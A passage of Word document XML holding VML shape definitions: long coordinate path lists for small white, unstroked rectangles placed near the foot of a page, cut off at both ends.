,14752,3881,14756,3881,14760,3881,14765,3881,14769,3881,14773,3881,14778,3881,14782,3881,14787,3881,14792,3881,14797,3881,14802,3881,14807,3881,14812,3881,14817,3881,14822,3881,14828,3881,14833,3881,14839,3881,14845,3881,14851,3881,14857,3881,14863,3881,14869,3881,14875,3881,14881,3881,14881,3881,14882,3881,14881,3881,14882,3881,14881,3881,14881,3881,14881,3881,14881,3881,14881,3881,14881,3881,14882,3881,14881,3881,14882,3881,14881,3881,14882,3881,14882,3881,14881,3881,14881,3881,14881,3880,14882,3880,14881,3880,14882,3880,14882,3880,14882,3880,14882,3880,14881,3880,14882,3880,14881,3879,14881,3879,14882,3879,14882,3879,14881,3879,14882,3878,14881,3878,14881,3878,14881,3878,14882,3877,14881,3877,14882,3877,14881,3876,14882,3876,14881,3876,14882,3875,14881,3875,14882,3874,14881,3874,14882,3874,14881,3873,14882,3873,14881,3872,14882,3872,14881,3871,14882,3870,14881,3870,14881,3869,14881,3868,14882,3868,14881,3867,14882,3866,14881,3866,14881,3865,14881,3864,14881,3863,14881,3862,14881,3861,14881,3860,14881,3860,14881,3859,14881,3858,14881,3857,14881,3855,14881,3854,14881,3853,14881,3852,14881,3851,14881,3850,14881,3848,14881,3847,14881,3846,14881,3844,14881,3843,14881,3842,14881,3840,14881,3839,14881,3837,14881,3836,14881,3834,14881,3832,14881,3831,14881,3829,14881,3827,14881,3825,14881,3824,14881,3822,14881,3820,14882,3818,14881,3816,14881,3814,14881,3812,14881,3810,14881,3808,14881,3805,14881,3803,14881,3801,14881,3798,14881,3796,14881,3794,14882,3791,14881,3789,14881,3786,14881,3784,14881,3781,14881,3778,14881,3775,14881,3773,14881,3770,14881,3767,14881,3764,14882,3761,14881,3761,14881,3761,14881,3761,14881,3761,14881,3761,14881,3761,14881,3761,14881,3761,14881,3761,14881,3761,14881,3761,14881,3761,14881,3761,14881,3761,14881,3761,14881,3761,14881,3761,14881,3761,14881,3761,14881,3761,14880,3761,14880,3761,14880,3761,14880,3761,14880,3761,14879,3761,14879,3761,14879,3761,14879,3761,14878,3761,14878,3761,14877,3761,14877,3761,14877,3761,14876,3761,14876,3761,14875,3761,14874,3761,14874,3761,14873,3761,14873,3761,14872,3761,14871,3761,14870,3761,14869,3761,14869,3761,14868,3761,14867,3761,14866,3761,14865,3761,14864,3761,14863,3761,14861,3761,14860,3761,14859,3761,14858,3761,14856,3761,14855,3761,14853,3761,14852,3761,14850,3761,14849,3761,14847,3761,14845,3761,14844,3761,14842,3761,14840,3761,14838,3761,14836,3761,14834,3761,14832,3761,14830,3761,14827,3761,14825,3761,14823,3761,14820,3761,14818,3761,14815,3761,14812,3761,14810,3761,14807,3761,14804,3761,14801,3761,14798,3761,14795,3761,14792,3761,14789,3761,14785,3761,14782,3761,14778,3761,14775,3761,14771,3761,14767,3761,14764,3761,14760,3761,14756,3761,14752,3761,14748,3761,14743,3761,14739,3761,14735,3761,14730,3761,14726,3761,14721,3761,14716,3761,14711,3761,14706,3761,14701,3761,14696,3761,14691,3761,14685,3761,14680,3761,14674,3761,14669,3761,14663,3761,14657,3761,14651,3761,14645,3761,14639,3761,14633,3761,14626e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:103.500pt;margin-top:749.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2070,14990" coordsize="130,250">
        <v:shape style="position:absolute;left:2070;top:14990;width:130;height:250" coordorigin="2070,14990" coordsize="130,250" path="m2095,15002l2095,15002,2095,15002,2095,15002,2095,15002,2095,15002,2095,15002,2095,15002,2095,15002,2095,15002,2095,15002,2095,15002,2095,15002,2095,15002,2095,15002,2095,15002,2095,15002,2095,15002,2095,15002,2095,15002,2096,15002,2096,15002,2096,15002,2096,15002,2096,15002,2096,15002,2096,15002,2096,15002,2096,15002,2097,15002,2097,15002,2097,15002,2097,15002,2097,15002,2098,15002,2098,15002,2098,15002,2098,15002,2099,15002,2099,15002,2099,15002,2100,15002,2100,15002,2100,15002,2101,15002,2101,15002,2102,15002,2102,15002,2102,15002,2103,15002,2103,15002,2104,15002,2105,15002,2105,15002,2106,15002,2106,15002,2107,15002,2108,15002,2108,15002,2109,15002,2110,15002,2110,15002,2111,15002,2112,15002,2113,15002,2114,15002,2115,15002,2116,15002,2116,15002,2117,15002,2118,15002,2119,15002,2121,15002,2122,15002,2123,15002,2124,15002,2125,15002,2126,15002,2128,15002,2129,15002,2130,15002,2132,15002,2133,15002,2134,15002,2136,15002,2137,15002,2139,15002,2140,15002,2142,15002,2144,15002,2145,15002,2147,15002,2149,15002,2151,15002,2152,15002,2154,15002,2156,15002,2158,15002,2160,15002,2162,15002,2164,15002,2166,15002,2168,15002,2171,15002,2173,15002,2175,15002,2178,15002,2180,15002,2182,15002,2185,15002,2187,15002,2190,15002,2192,15002,2195,15002,2198,15002,2201,15002,2203,15002,2206,15002,2209,15002,2212,15002,2215,15002,2215,15002,2215,15002,2215,15002,2215,15002,2215,15002,2215,15002,2215,15002,2215,15002,2215,15002,2215,15002,2215,15002,2215,15002,2215,15002,2215,15002,2215,15002,2215,15002,2215,15002,2215,15002,2215,15002,2215,15003,2215,15003,2215,15003,2215,15003,2215,15003,2215,15004,2215,15004,2215,15004,2215,15005,2215,15005,2215,15005,2215,15006,2215,15006,2215,15007,2215,15007,2215,15008,2215,15008,2215,15009,2215,15009,2215,15010,2215,15011,2215,15011,2215,15012,2215,15013,2215,15014,2215,15014,2215,15015,2215,15016,2215,15017,2215,15018,2215,15019,2215,15020,2215,15022,2215,15023,2215,15024,2215,15025,2215,15027,2215,15028,2215,15030,2215,15031,2215,15033,2215,15034,2215,15036,2215,15038,2215,15039,2215,15041,2215,15043,2215,15045,2215,15047,2215,15049,2215,15051,2215,15053,2215,15056,2215,15058,2215,15060,2215,15063,2215,15065,2215,15068,2215,15071,2215,15073,2215,15076,2215,15079,2215,15082,2215,15085,2215,15088,2215,15091,2215,15095,2215,15098,2215,15101,2215,15105,2215,15108,2215,15112,2215,15116,2215,15119,2215,15123,2215,15127,2215,15131,2215,15136,2215,15140,2215,15144,2215,15148,2215,15153,2215,15158,2215,15162,2215,15167,2215,15172,2215,15177,2215,15182,2215,15187,2215,15192,2215,15198,2215,15203,2215,15209,2215,15214,2215,15220,2215,15226,2215,15232,2215,15238,2215,15244,2215,15250,2215,15257,2215,15257,2215,15257,2215,15257,2215,15257,2215,15257,2215,15257,2215,15257,2215,15257,2215,15257,2215,15257,2215,15257,2215,15257,2215,15257,2215,15257,2215,15257,2215,15257,2215,15257,2215,15257,2215,15257,2215,15257,2215,15257,2214,15257,2214,15257,2214,15257,2214,15257,2214,15257,2214,15257,2214,15257,2214,15257,2213,15257,2213,15257,2213,15257,2213,15257,2213,15257,2212,15257,2212,15257,2212,15257,2212,15257,2211,15257,2211,15257,2211,15257,2210,15257,2210,15257,2209,15257,2209,15257,2209,15257,2208,15257,2208,15257,2207,15257,2207,15257,2206,15257,2206,15257,2205,15257,2205,15257,2204,15257,2203,15257,2203,15257,2202,15257,2201,15257,2200,15257,2200,15257,2199,15257,2198,15257,2197,15257,2196,15257,2196,15257,2195,15257,2194,15257,2193,15257,2192,15257,2191,15257,2190,15257,2189,15257,2187,15257,2186,15257,2185,15257,2184,15257,2183,15257,2181,15257,2180,15257,2179,15257,2177,15257,2176,15257,2174,15257,2173,15257,2171,15257,2170,15257,2168,15257,2167,15257,2165,15257,2163,15257,2161,15257,2160,15257,2158,15257,2156,15257,2154,15257,2152,15257,2150,15257,2148,15257,2146,15257,2144,15257,2142,15257,2140,15257,2137,15257,2135,15257,2133,15257,2130,15257,2128,15257,2125,15257,2123,15257,2120,15257,2118,15257,2115,15257,2112,15257,2110,15257,2107,15257,2104,15257,2101,15257,2098,15257,2095,15257,2095,15257,2095,15257,2095,15257,2095,15257,2095,15257,2095,15257,2095,15257,2095,15257,2095,15257,2095,15257,2095,15257,2095,15256,2095,15256,2095,15256,2095,15256,2095,15256,2095,15256,2095,15256,2095,15256,2095,15256,2095,15255,2095,15255,2095,15255,2095,15255,2095,15255,2095,15254,2095,15254,2095,15254,2095,15253,2095,15253,2095,15253,2095,15252,2095,15252,2095,15251,2095,15251,2095,15250,2095,15250,2095,15249,2095,15248,2095,15248,2095,15247,2095,15246,2095,15245,2095,15245,2095,15244,2095,15243,2095,15242,2095,15241,2095,15240,2095,15239,2095,15238,2095,15237,2095,15235,2095,15234,2095,15233,2095,15231,2095,15230,2095,15229,2095,15227,2095,15226,2095,15224,2095,15222,2095,15221,2095,15219,2095,15217,2095,15215,2095,15213,2095,15211,2095,15209,2095,15207,2095,15205,2095,15203,2095,15200,2095,15198,2095,15195,2095,15193,2095,15190,2095,15188,2095,15185,2095,15182,2095,15179,2095,15176,2095,15173,2095,15170,2095,15167,2095,15164,2095,15160,2095,15157,2095,15154,2095,15150,2095,15146,2095,15143,2095,15139,2095,15135,2095,15131,2095,15127,2095,15123,2095,15119,2095,15114,2095,15110,2095,15105,2095,15101,2095,15096,2095,15091,2095,15086,2095,15081,2095,15076,2095,15071,2095,15066,2095,15061,2095,15055,2095,15050,2095,15044,2095,15038,2095,15032,2095,15026,2095,15020,2095,15014,2095,15008,2095,15002e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:235.500pt;margin-top:749.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4710,14990" coordsize="130,250">
        <v:shape style="position:absolute;left:4710;top:14990;width:130;height:250" coordorigin="4710,14990" coordsize="130,250" path="m4736,15002l4736,15002,4736,15002,4736,15002,4736,15002,4736,15002,4736,15002,4736,15002,4736,15002,4736,15002,4736,15002,4736,15002,4736,15002,4737,15002,4737,15002,4737,15002,4737,15002,4737,15002,4737,15002,4737,15002,4737,15002,4737,15002,4737,15002,4737,15002,4737,15002,4737,15002,4737,15002,4738,15002,4738,15002,4738,15002,4738,15002,4738,15002,4739,15002,4739,15002,4739,15002,4739,15002,4739,15002,4740,15002,4740,15002,4740,15002,4741,15002,4741,15002,4741,15002,4742,15002,4742,15002,4742,15002,4743,15002,4743,15002,4744,15002,4744,15002,4745,15002,4745,15002,4746,15002,4746,15002,4747,15002,4748,15002,4748,15002,4749,15002,4750,15002,4750,15002,4751,15002,4752,15002,4753,15002,4753,15002,4754,15002,4755,15002,4756,15002,4757,15002,4758,15002,4759,15002,4760,15002,4761,15002,4762,15002,4763,15002,4764,15002,4765,15002,4766,15002,4768,15002,4769,15002,4770,15002,4772,15002,4773,15002,4774,15002,4776,15002,4777,15002,4779,15002,4780,15002,4782,15002,4783,15002,4785,15002,4787,15002,4788,15002,4790,15002,4792,15002,4794,15002,4796,15002,4797,15002,4799,15002,4801,15002,4803,15002,4806,15002,4808,15002,4810,15002,4812,15002,4814,15002,4817,15002,4819,15002,4821,15002,4824,15002,4826,15002,4829,15002,4831,15002,4834,15002,4836,15002,4839,15002,4842,15002,4845,15002,4848,15002,4850,15002,4853,15002,4856,15002,4856,15002,4856,15002,4856,15002,4856,15002,4856,15002,4856,15002,4856,15002,4856,15002,4856,15002,4856,15002,4856,15002,4856,15002,4856,15002,4856,15002,4856,15002,4856,15002,4856,15002,4856,15002,4856,15002,4856,15003,4856,15003,4856,15003,4856,15003,4856,15003,4856,15004,4856,15004,4856,15004,4856,15005,4856,15005,4856,15005,4856,15006,4856,15006,4856,15007,4856,15007,4856,15008,4856,15008,4856,15009,4856,15009,4856,15010,4856,15011,4856,15011,4856,15012,4856,15013,4856,15014,4856,15014,4856,15015,4856,15016,4856,15017,4856,15018,4856,15019,4856,15020,4856,15022,4856,15023,4856,15024,4856,15025,4856,15027,4856,15028,4856,15030,4856,15031,4856,15033,4856,15034,4856,15036,4856,15038,4856,15039,4856,15041,4856,15043,4856,15045,4856,15047,4856,15049,4856,15051,4856,15053,4856,15056,4856,15058,4856,15060,4856,15063,4856,15065,4856,15068,4856,15071,4856,15073,4856,15076,4856,15079,4856,15082,4856,15085,4856,15088,4856,15091,4856,15095,4856,15098,4856,15101,4856,15105,4856,15108,4856,15112,4856,15116,4856,15119,4856,15123,4856,15127,4856,15131,4856,15136,4856,15140,4856,15144,4856,15148,4856,15153,4856,15158,4856,15162,4856,15167,4856,15172,4856,15177,4856,15182,4856,15187,4856,15192,4856,15198,4856,15203,4856,15209,4856,15214,4856,15220,4856,15226,4856,15232,4856,15238,4856,15244,4856,15250,4856,15257,4856,15257,4856,15257,4856,15257,4856,15257,4856,15257,4856,15257,4856,15257,4856,15257,4856,15257,4856,15257,4856,15257,4856,15257,4856,15257,4856,15257,4856,15257,4856,15257,4856,15257,4856,15257,4856,15257,4856,15257,4856,15257,4856,15257,4856,15257,4856,15257,4855,15257,4855,15257,4855,15257,4855,15257,4855,15257,4855,15257,4855,15257,4854,15257,4854,15257,4854,15257,4854,15257,4853,15257,4853,15257,4853,15257,4853,15257,4852,15257,4852,15257,4852,15257,4851,15257,4851,15257,4850,15257,4850,15257,4850,15257,4849,15257,4849,15257,4848,15257,4848,15257,4847,15257,4846,15257,4846,15257,4845,15257,4845,15257,4844,15257,4843,15257,4843,15257,4842,15257,4841,15257,4840,15257,4839,15257,4839,15257,4838,15257,4837,15257,4836,15257,4835,15257,4834,15257,4833,15257,4832,15257,4831,15257,4830,15257,4829,15257,4828,15257,4826,15257,4825,15257,4824,15257,4823,15257,4821,15257,4820,15257,4819,15257,4817,15257,4816,15257,4814,15257,4813,15257,4811,15257,4810,15257,4808,15257,4806,15257,4805,15257,4803,15257,4801,15257,4799,15257,4797,15257,4795,15257,4793,15257,4791,15257,4789,15257,4787,15257,4785,15257,4783,15257,4781,15257,4779,15257,4776,15257,4774,15257,4772,15257,4769,15257,4767,15257,4764,15257,4762,15257,4759,15257,4756,15257,4754,15257,4751,15257,4748,15257,4745,15257,4742,15257,4739,15257,4736,15257,4736,15257,4736,15257,4736,15257,4736,15257,4736,15257,4736,15257,4736,15257,4736,15257,4736,15257,4736,15257,4736,15257,4736,15256,4736,15256,4736,15256,4736,15256,4736,15256,4736,15256,4736,15256,4736,15256,4736,15256,4736,15255,4736,15255,4736,15255,4736,15255,4736,15255,4736,15254,4736,15254,4736,15254,4736,15253,4736,15253,4736,15253,4736,15252,4736,15252,4736,15251,4736,15251,4736,15250,4736,15250,4736,15249,4736,15248,4736,15248,4736,15247,4736,15246,4736,15245,4736,15245,4736,15244,4736,15243,4736,15242,4736,15241,4736,15240,4736,15239,4736,15238,4736,15237,4736,15235,4736,15234,4736,15233,4736,15231,4736,15230,4736,15229,4736,15227,4736,15226,4736,15224,4736,15222,4736,15221,4736,15219,4736,15217,4736,15215,4736,15213,4736,15211,4736,15209,4736,15207,4736,15205,4736,15203,4736,15200,4736,15198,4736,15195,4736,15193,4736,15190,4736,15188,4736,15185,4736,15182,4736,15179,4736,15176,4736,15173,4736,15170,4736,15167,4736,15164,4736,15160,4736,15157,4736,15154,4736,15150,4736,15146,4736,15143,4736,15139,4736,15135,4736,15131,4736,15127,4736,15123,4736,15119,4736,15114,4736,15110,4736,15105,4736,15101,4736,15096,4736,15091,4736,15086,4736,15081,4736,15076,4736,15071,4736,15066,4736,15061,4736,15055,4736,15050,4736,15044,4736,15038,4736,15032,4736,15026,4736,15020,4736,15014,4736,15008,4736,15002e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:313.500pt;margin-top:749.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6270,14990" coordsize="130,250">
        <v:shape style="position:absolute;left:6270;top:14990;width:130;height:250" coordorigin="6270,14990" coordsize="130,250" path="m6297,15002l6297,15002,6297,15002,6297,15002,6297,15002,6297,15002,6297,15002,6297,15002,6297,15002,6297,15002,6297,15002,6297,15002,6297,15002,6297,15002,6297,15002,6297,15002,6297,15002,6297,15002,6298,15002,6298,15002,6298,15002,6298,15002,6298,15002,6298,15002,6298,15002,6298,15002,6298,15002,6298,15002,6299,15002,6299,15002,6299,15002,6299,15002,6299,15002,6300,15002,6300,15002,6300,15002,6300,15002,6300,15002,6301,15002,6301,15002,6301,15002,6302,15002,6302,15002,6302,15002,6303,15002,6303,15002,6304,15002,6304,15002,6305,15002,6305,15002,6306,15002,6306,15002,6307,15002,6307,15002,6308,15002,6308,15002,6309,15002,6310,15002,6310,15002,6311,15002,6312,15002,6313,15002,6313,15002,6314,15002,6315,15002,6316,15002,6317,15002,6318,15002,6319,15002,6320,15002,6321,15002,6322,15002,6323,15002,6324,15002,6325,15002,6326,15002,6327,15002,6328,15002,6330,15002,6331,15002,6332,15002,6334,15002,6335,15002,6336,15002,6338,15002,6339,15002,6341,15002,6342,15002,6344,15002,6346,15002,6347,15002,6349,15002,6351,15002,6353,15002,6354,15002,6356,15002,6358,15002,6360,15002,6362,15002,6364,15002,6366,15002,6368,15002,6371,15002,6373,15002,6375,15002,6377,15002,6380,15002,6382,15002,6384,15002,6387,15002,6389,15002,6392,15002,6395,15002,6397,15002,6400,15002,6403,15002,6406,15002,6408,15002,6411,15002,6414,15002,6417,15002,6417,15002,6417,15002,6417,15002,6417,15002,6417,15002,6417,15002,6417,15002,6417,15002,6417,15002,6417,15002,6417,15002,6417,15002,6417,15002,6417,15002,6417,15002,6417,15002,6417,15002,6417,15002,6417,15002,6417,15003,6417,15003,6417,15003,6417,15003,6417,15003,6417,15004,6417,15004,6417,15004,6417,15005,6417,15005,6417,15005,6417,15006,6417,15006,6417,15007,6417,15007,6417,15008,6417,15008,6417,15009,6417,15009,6417,15010,6417,15011,6417,15011,6417,15012,6417,15013,6417,15014,6417,15014,6417,15015,6417,15016,6417,15017,6417,15018,6417,15019,6417,15020,6417,15022,6417,15023,6417,15024,6417,15025,6417,15027,6417,15028,6417,15030,6417,15031,6417,15033,6417,15034,6417,15036,6417,15038,6417,15039,6417,15041,6417,15043,6417,15045,6417,15047,6417,15049,6417,15051,6417,15053,6417,15056,6417,15058,6417,15060,6417,15063,6417,15065,6417,15068,6417,15071,6417,15073,6417,15076,6417,15079,6417,15082,6417,15085,6417,15088,6417,15091,6417,15095,6417,15098,6417,15101,6417,15105,6417,15108,6417,15112,6417,15116,6417,15119,6417,15123,6417,15127,6417,15131,6417,15136,6417,15140,6417,15144,6417,15148,6417,15153,6417,15158,6417,15162,6417,15167,6417,15172,6417,15177,6417,15182,6417,15187,6417,15192,6417,15198,6417,15203,6417,15209,6417,15214,6417,15220,6417,15226,6417,15232,6417,15238,6417,15244,6417,15250,6417,15257,6417,15257,6417,15257,6417,15257,6417,15257,6417,15257,6417,15257,6417,15257,6417,15257,6417,15257,6417,15257,6417,15257,6417,15257,6417,15257,6417,15257,6417,15257,6417,15257,6417,15257,6417,15257,6417,15257,6417,15257,6417,15257,6417,15257,6416,15257,6416,15257,6416,15257,6416,15257,6416,15257,6416,15257,6416,15257,6415,15257,6415,15257,6415,15257,6415,15257,6415,15257,6414,15257,6414,15257,6414,15257,6414,15257,6413,15257,6413,15257,6413,15257,6412,15257,6412,15257,6412,15257,6411,15257,6411,15257,6410,15257,6410,15257,6409,15257,6409,15257,6408,15257,6408,15257,6407,15257,6407,15257,6406,15257,6405,15257,6405,15257,6404,15257,6403,15257,6403,15257,6402,15257,6401,15257,6400,15257,6399,15257,6399,15257,6398,15257,6397,15257,6396,15257,6395,15257,6394,15257,6393,15257,6392,15257,6391,15257,6390,15257,6388,15257,6387,15257,6386,15257,6385,15257,6383,15257,6382,15257,6381,15257,6379,15257,6378,15257,6376,15257,6375,15257,6373,15257,6372,15257,6370,15257,6369,15257,6367,15257,6365,15257,6364,15257,6362,15257,6360,15257,6358,15257,6356,15257,6354,15257,6352,15257,6350,15257,6348,15257,6346,15257,6344,15257,6342,15257,6339,15257,6337,15257,6335,15257,6332,15257,6330,15257,6327,15257,6325,15257,6322,15257,6320,15257,6317,15257,6314,15257,6312,15257,6309,15257,6306,15257,6303,15257,6300,15257,6297,15257,6297,15257,6297,15257,6297,15257,6297,15257,6297,15257,6297,15257,6297,15257,6297,15257,6297,15257,6297,15257,6297,15257,6297,15256,6297,15256,6297,15256,6297,15256,6297,15256,6297,15256,6297,15256,6297,15256,6297,15256,6297,15255,6297,15255,6297,15255,6297,15255,6297,15255,6297,15254,6297,15254,6297,15254,6297,15253,6297,15253,6297,15253,6297,15252,6297,15252,6297,15251,6297,15251,6297,15250,6297,15250,6297,15249,6297,15248,6297,15248,6297,15247,6297,15246,6297,15245,6297,15245,6297,15244,6297,15243,6297,15242,6297,15241,6297,15240,6297,15239,6297,15238,6297,15237,6297,15235,6297,15234,6297,15233,6297,15231,6297,15230,6297,15229,6297,15227,6297,15226,6297,15224,6297,15222,6297,15221,6297,15219,6297,15217,6297,15215,6297,15213,6297,15211,6297,15209,6297,15207,6297,15205,6297,15203,6297,15200,6297,15198,6297,15195,6297,15193,6297,15190,6297,15188,6297,15185,6297,15182,6297,15179,6297,15176,6297,15173,6297,15170,6297,15167,6297,15164,6297,15160,6297,15157,6297,15154,6297,15150,6297,15146,6297,15143,6297,15139,6297,15135,6297,15131,6297,15127,6297,15123,6297,15119,6297,15114,6297,15110,6297,15105,6297,15101,6297,15096,6297,15091,6297,15086,6297,15081,6297,15076,6297,15071,6297,15066,6297,15061,6297,15055,6297,15050,6297,15044,6297,15038,6297,15032,6297,15026,6297,15020,6297,15014,6297,15008,6297,15002e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:283.500pt;margin-top:762.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5670,15250" coordsize="130,270">
        <v:shape style="position:absolute;left:5670;top:15250;width:130;height:270" coordorigin="5670,15250" coordsize="130,270" path="m5682,15272l5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5683,15272,5683,15272,5683,15272,5683,15272,5683,15272,5683,15272,5683,15272,5683,15272,5684,15272,5684,15272,5684,15272,5684,15272,5684,15272,5685,15272,5685,15272,5685,15272,5685,15272,5686,15272,5686,15272,5686,15272,5687,15272,5687,15272,5688,15272,5688,15272,5688,15272,5689,15272,5689,15272,5690,15272,5690,15272,5691,15272,5691,15272,5692,15272,5692,15272,5693,15272,5694,15272,5694,15272,5695,15272,5696,15272,5696,15272,5697,15272,5698,15272,5699,15272,5700,15272,5701,15272,5701,15272,5702,15272,5703,15272,5704,15272,5705,15272,5706,15272,5707,15272,5708,15272,5710,15272,5711,15272,5712,15272,5713,15272,5714,15272,5716,15272,5717,15272,5718,15272,5720,15272,5721,15272,5723,15272,5724,15272,5726,15272,5727,15272,5729,15272,5730,15272,5732,15272,5734,15272,5736,15272,5737,15272,5739,15272,5741,15272,5743,15272,5745,15272,5747,15272,5749,15272,5751,15272,5753,15272,5755,15272,5757,15272,5760,15272,5762,15272,5764,15272,5767,15272,5769,15272,5772,15272,5774,15272,5777,15272,5779,15272,5782,15272,5785,15272,5787,15272,5790,15272,5793,15272,5796,15272,5799,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15273,5802,15273,5802,15273,5802,15273,5802,15273,5802,15274,5802,15274,5802,15274,5802,15274,5802,15275,5802,15275,5802,15275,5802,15276,5802,15276,5802,15277,5802,15277,5802,15278,5802,15278,5802,15279,5802,15279,5802,15280,5802,15281,5802,15281,5802,15282,5802,15283,5802,15284,5802,15285,5802,15285,5802,15286,5802,15287,5802,15288,5802,15290,5802,15291,5802,15292,5802,15293,5802,15294,5802,15296,5802,15297,5802,15298,5802,15300,5802,15301,5802,15303,5802,15304,5802,15306,5802,15308,5802,15310,5802,15311,5802,15313,5802,15315,5802,15317,5802,15319,5802,15321,5802,15324,5802,15326,5802,15328,5802,15331,5802,15333,5802,15336,5802,15338,5802,15341,5802,15344,5802,15346,5802,15349,5802,15352,5802,15355,5802,15358,5802,15361,5802,15365,5802,15368,5802,15371,5802,15375,5802,15378,5802,15382,5802,15386,5802,15390,5802,15393,5802,15397,5802,15402,5802,15406,5802,15410,5802,15414,5802,15419,5802,15423,5802,15428,5802,15432,5802,15437,5802,15442,5802,15447,5802,15452,5802,15457,5802,15462,5802,15468,5802,15473,5802,15479,5802,15484,5802,15490,5802,15496,5802,15502,5802,15508,5802,15514,5802,15520,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5801,15527,5801,15527,5801,15527,5801,15527,5801,15527,5801,15527,5801,15527,5801,15527,5801,15527,5800,15527,5800,15527,5800,15527,5800,15527,5800,15527,5799,15527,5799,15527,5799,15527,5799,15527,5798,15527,5798,15527,5798,15527,5797,15527,5797,15527,5797,15527,5796,15527,5796,15527,5795,15527,5795,15527,5795,15527,5794,15527,5794,15527,5793,15527,5792,15527,5792,15527,5791,15527,5791,15527,5790,15527,5789,15527,5789,15527,5788,15527,5787,15527,5787,15527,5786,15527,5785,15527,5784,15527,5783,15527,5782,15527,5781,15527,5780,15527,5780,15527,5779,15527,5777,15527,5776,15527,5775,15527,5774,15527,5773,15527,5772,15527,5771,15527,5769,15527,5768,15527,5767,15527,5765,15527,5764,15527,5763,15527,5761,15527,5760,15527,5758,15527,5757,15527,5755,15527,5753,15527,5752,15527,5750,15527,5748,15527,5746,15527,5745,15527,5743,15527,5741,15527,5739,15527,5737,15527,5735,15527,5733,15527,5731,15527,5729,15527,5726,15527,5724,15527,5722,15527,5719,15527,5717,15527,5715,15527,5712,15527,5710,15527,5707,15527,5704,15527,5702,15527,5699,15527,5696,15527,5694,15527,5691,15527,5688,15527,5685,15527,5682,15527,5682,15527,5682,15527,5682,15527,5682,15527,5682,15527,5682,15527,5682,15527,5682,15527,5682,15527,5682,15527,5682,15527,5682,15527,5682,15527,5682,15526,5682,15526,5682,15526,5682,15526,5682,15526,5682,15526,5682,15526,5682,15526,5682,15525,5682,15525,5682,15525,5682,15525,5682,15524,5682,15524,5682,15524,5682,15524,5682,15523,5682,15523,5682,15522,5682,15522,5682,15521,5682,15521,5682,15520,5682,15520,5682,15519,5682,15519,5682,15518,5682,15517,5682,15516,5682,15516,5682,15515,5682,15514,5682,15513,5682,15512,5682,15511,5682,15510,5682,15509,5682,15508,5682,15507,5682,15506,5682,15504,5682,15503,5682,15502,5682,15500,5682,15499,5682,15497,5682,15496,5682,15494,5682,15492,5682,15491,5682,15489,5682,15487,5682,15485,5682,15483,5682,15481,5682,15479,5682,15477,5682,15475,5682,15473,5682,15470,5682,15468,5682,15465,5682,15463,5682,15460,5682,15458,5682,15455,5682,15452,5682,15449,5682,15446,5682,15443,5682,15440,5682,15437,5682,15434,5682,15431,5682,15427,5682,15424,5682,15420,5682,15416,5682,15413,5682,15409,5682,15405,5682,15401,5682,15397,5682,15393,5682,15389,5682,15384,5682,15380,5682,15375,5682,15371,5682,15366,5682,15361,5682,15357,5682,15352,5682,15347,5682,15341,5682,15336,5682,15331,5682,15325,5682,15320,5682,15314,5682,15308,5682,15303,5682,15297,5682,15291,5682,15284,5682,15278,5682,15272e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:289.500pt;margin-top:762.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5790,15250" coordsize="130,270">
        <v:shape style="position:absolute;left:5790;top:15250;width:130;height:270" coordorigin="5790,15250" coordsize="130,270" path="m5802,15272l5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5803,15272,5803,15272,5803,15272,5803,15272,5803,15272,5803,15272,5803,15272,5803,15272,5804,15272,5804,15272,5804,15272,5804,15272,5804,15272,5805,15272,5805,15272,5805,15272,5806,15272,5806,15272,5806,15272,5806,15272,5807,15272,5807,15272,5808,15272,5808,15272,5808,15272,5809,15272,5809,15272,5810,15272,5810,15272,5811,15272,5811,15272,5812,15272,5813,15272,5813,15272,5814,15272,5814,15272,5815,15272,5816,15272,5817,15272,5817,15272,5818,15272,5819,15272,5820,15272,5821,15272,5821,15272,5822,15272,5823,15272,5824,15272,5825,15272,5826,15272,5827,15272,5829,15272,5830,15272,5831,15272,5832,15272,5833,15272,5834,15272,5836,15272,5837,15272,5838,15272,5840,15272,5841,15272,5843,15272,5844,15272,5846,15272,5847,15272,5849,15272,5850,15272,5852,15272,5854,15272,5856,15272,5857,15272,5859,15272,5861,15272,5863,15272,5865,15272,5867,15272,5869,15272,5871,15272,5873,15272,5875,15272,5878,15272,5880,15272,5882,15272,5884,15272,5887,15272,5889,15272,5892,15272,5894,15272,5897,15272,5899,15272,5902,15272,5905,15272,5907,15272,5910,15272,